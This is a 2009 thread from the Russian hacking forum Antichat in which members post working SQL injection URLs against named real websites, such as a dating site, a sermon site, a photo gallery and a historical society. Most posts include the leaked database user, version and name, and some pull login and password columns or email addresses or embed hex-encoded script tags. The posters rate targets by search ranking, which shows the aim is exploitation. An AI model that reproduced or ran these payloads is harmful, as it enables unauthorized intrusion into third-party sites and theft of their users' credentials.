HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.09.2009, 19:34
cremator (c)
Постоянный
Регистрация: 20.06.2008
Сообщений: 323
С нами: 9416345

Репутация: 165
По умолчанию

Код:
http://shubarov.ru/photo/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database(),0x202D20,Version()),null,1,null,0,0,1,0,0,1,0,0,1,null,null,0,0,1,1
shubarov_ru@212.0.65.74 - shubarov_ru - 5.1.24-rc-log

Код:
http://jkf.israphotos.com/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database(),0x202D20,Version()),null,1,null,0,0,1,0,0,1,0,0,1,null,null,0,0,1,1/*
dbo191724041@74.208.16.167 - db191724041 - 4.0.27-max-log
 
Ответить с цитированием

  #2  
Старый 10.09.2009, 02:40
cremator (c)
Постоянный
Регистрация: 20.06.2008
Сообщений: 323
С нами: 9416345

Репутация: 165
По умолчанию

Код:
http://www.vecxel.com/rain/sermon/sermon_order.php?sermon_id=4+union+select+1,concat(version(),database(),user()),3,4,5,6,7,8
Database Version: 5.0.67.d7-ourdelta-log
Database name: latterrain
User name: latterrain@208.109.14.88

PR2

Последний раз редактировалось jokester; 10.09.2009 в 10:54.. Причина: пароли
 
Ответить с цитированием

  #3  
Старый 10.09.2009, 19:20
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами: 9204308

Репутация: 256
По умолчанию

Цитата:
_ttp://www.examen.biz/book.php?id=-1859+union+select+1,2,3,database(),5,6,7,8,9,10,ve rsion(),12,user(),14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31+from+user+--+
4.0.27-log
examen@pm1.zenon.net
examen
 
Ответить с цитированием

  #4  
Старый 10.09.2009, 19:34
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

http://www.usaonlinedatingsite.com/p.php?id=-1%20UNION%20SELECT,1,2,3,4,concat_ws%280x3a,login, password%29,6,7,8,9,10,11,12,13,14,15,16,17,18%20F ROM%20usaonli_db1.frm_users%20LIMIT%200,1--


5 версия...
 
Ответить с цитированием

  #5  
Старый 10.09.2009, 19:56
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
С нами: 9230726

Репутация: 454
По умолчанию

Цитата:
http://trudovoy.webworks.ru domin_gallery.php?did=1;select+cast(version()+as+i nt)
PostgreSQL 8.2.3 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 20061011 (Red Hat 4.1.1-30)

Последний раз редактировалось Swift; 12.09.2009 в 22:37..
 
Ответить с цитированием

  #6  
Старый 10.09.2009, 20:15
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
С нами: 9069748

Репутация: 438
По умолчанию

iwsi.org pr3
The International Women's Studies Institute.
Код:
http://www.iwsi.org/pages.cfm?ID=null union all select null,null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E),null,null,null,null,null,null,null,null,null,null
4.1.20-log/eboneparth@216.119.112.191/iwsicontent
 
Ответить с цитированием

  #7  
Старый 11.09.2009, 00:30
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Код:
http://velosport.ru/catalog/?cid=3&id=55+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database())--
w_hbsp@195.42.160.50:4.1.20-1.gms:w_hbsp

ТИЦ: 230




Код:
http://ckpt.ru/newsdetails.html?id=-97+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7--

exportbe_ckpt@v15.valuehost.ru:4.0.27-max-log:exportbe_ckpt

ТИЦ: 20
PR: 4
 
Ответить с цитированием

  #8  
Старый 11.09.2009, 01:07
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

Смог найти префикс, и всё
Код:
http://www.st-art.ru/?go=catalog&cat_id=1+UNION+SELECT+1,concat(newsid,0x3a3a3a,newstext),3,4+from+im_news/*
Ну и стандартный набор
Код:
http://www.st-art.ru/?go=catalog&cat_id=1+UNION+SELECT+1,concat(user(),0x3a3a3a,database(),0x3a3a3a,version()),3,4+from+im_news/*
im_st-art_ru@zvm12.host.ru:::im_st-art_ru:::4.0.27-log
Ну и из кэша гугла путь
/bhome/part1/02/start/st-art.ru/www/main.php

Последний раз редактировалось Ponchik; 11.09.2009 в 01:11..
 
Ответить с цитированием

  #9  
Старый 11.09.2009, 10:13
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
С нами: 9069748

Репутация: 438
По умолчанию

antrimhistory.net pr4
The Glens of Antrim Historical Society
Код:
http://www.antrimhistory.net/content.php?cid=50+UNION+SELECT+null,null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+LIMIT+1,1/*
4.1.22-Max/u1001104_goahs@172.16.3.36/db1001104_goahs
 
Ответить с цитированием

  #10  
Старый 11.09.2009, 16:33
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами: 8954306

Репутация: 1588
По умолчанию

www.agidev.com - PR=4
http://www.agidev.com/articles/a.php?id=1/**/and/**/1=7%20/**/uniON/**/seLeCT/**/1,2,3,version(),5/*
version - 5.0.45-log
user - agidev_client@apache2-emu.wolverine.dreamhost.com
database - agidev_site
os - unknown-linux-gnu
http://www.agidev.com/articles/a.php?id=1/**/and/**/1=7%20/**/uniON/**/seLeCT/**/1,2,3,email,5/**/FROM/**/people/**/LIMIT/**/0,1
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.